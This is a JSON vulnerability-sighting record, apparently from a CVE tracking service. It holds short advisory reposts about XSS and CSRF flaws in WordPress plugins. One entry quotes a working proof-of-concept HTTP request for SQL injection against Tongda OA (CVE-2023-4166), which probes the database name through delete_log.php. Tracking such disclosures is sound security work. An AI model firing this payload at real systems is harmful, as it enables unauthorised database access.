{"vulnerability": "cve-2023-4166", "sightings": [{"uuid": "8a086ce4-6e9d-40af-b1ee-db9ff044bb82", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41664", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113647463877853767", "content": "", "creation_timestamp": "2024-12-13T20:44:39.327107Z"}, {"uuid": "d5447c34-0559-4d8b-96c2-bfbdf132aa2c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41666", "type": "seen", "source": "https://t.me/cibsecurity/71309", "content": "\u203c CVE-2023-41666 \u203c\n\nAuth. (contributor+) Stored Cross-Site Scripting (XSS) vulnerability in Stockdio Stock Quotes List plugin <=\u00a02.9.9 versions.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-09-29T18:38:00.000000Z"}, {"uuid": "7b7e4480-d05b-482b-b452-1b0c4a629f14", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41669", "type": "seen", "source": "https://t.me/cibsecurity/71856", "content": "\u203c CVE-2023-41669 \u203c\n\nCross-Site Request Forgery (CSRF) vulnerability in DAEXT Live News plugin <=\u00a01.06 versions.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-10-09T22:16:09.000000Z"}, {"uuid": "dcb891b3-ebe1-4bb3-81b8-f5b4a54edb93", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41668", "type": "seen", "source": "https://t.me/cibsecurity/71853", "content": "\u203c CVE-2023-41668 \u203c\n\nCross-Site Request Forgery (CSRF) vulnerability in Leadster plugin <=\u00a01.1.2 versions.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", 
"creation_timestamp": "2023-10-09T22:16:06.000000Z"}, {"uuid": "e7a2a652-0403-42c0-b5d8-ae81fe1a7238", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41667", "type": "seen", "source": "https://t.me/cibsecurity/71850", "content": "\u203c CVE-2023-41667 \u203c\n\nCross-Site Request Forgery (CSRF) vulnerability in Ulf Benjaminsson WP-dTree plugin <=\u00a04.4.5 versions.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-10-09T22:16:02.000000Z"}, {"uuid": "1eb49c8e-0adb-4878-9101-b926c4b1ff2f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41660", "type": "seen", "source": "https://t.me/cibsecurity/71847", "content": "\u203c CVE-2023-41660 \u203c\n\nCross-Site Request Forgery (CSRF) vulnerability in WPSynchro WP Synchro plugin <=\u00a01.9.1 versions.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-10-09T18:16:01.000000Z"}, {"uuid": "2fd39670-3ec0-41ab-904d-d02a277718bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41661", "type": "seen", "source": "https://t.me/cibsecurity/71300", "content": "\u203c CVE-2023-41661 \u203c\n\nAuth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in PressPage Entertainment Inc. Smarty for WordPress plugin <=\u00a03.1.35 versions.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-09-29T18:37:50.000000Z"}, {"uuid": "62463a04-8ef3-4594-9dc2-0aa8383440d9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41663", "type": "seen", "source": "https://t.me/cibsecurity/71298", "content": "\u203c CVE-2023-41663 \u203c\n\nUnauth. Reflected Cross-Site Scripting (XSS) vulnerability in Giovambattista Fazioli WP Bannerize Pro plugin <=\u00a01.6.9 versions.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-09-29T18:37:48.000000Z"}, {"uuid": "38556059-a37f-464b-bb62-9da0d706c7b3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41662", "type": "seen", "source": "https://t.me/cibsecurity/71295", "content": "\u203c CVE-2023-41662 \u203c\n\nUnauth. Reflected Cross-Site Scripting (XSS) vulnerability in Ulf Benjaminsson WP-dTree plugin <=\u00a04.4.5 versions.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-09-29T18:37:45.000000Z"}, {"uuid": "7efbc9fa-f934-4f37-a138-57f83af8023c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-4166", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/857", "content": "Tongda OA SQL injection vulnerability CVE-2023-4166 POC\n\nGET /general/system/seal_manage/dianju/delete_log.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1 HTTP/1.1\nHost: 127.0.0.1:8080\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nAccept-Encoding: gzip, deflate\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n2023  \ud83c\udde8\ud83c\uddf3Hu Wang poc \n#poc", "creation_timestamp": "2023-10-10T15:06:55.000000Z"}]}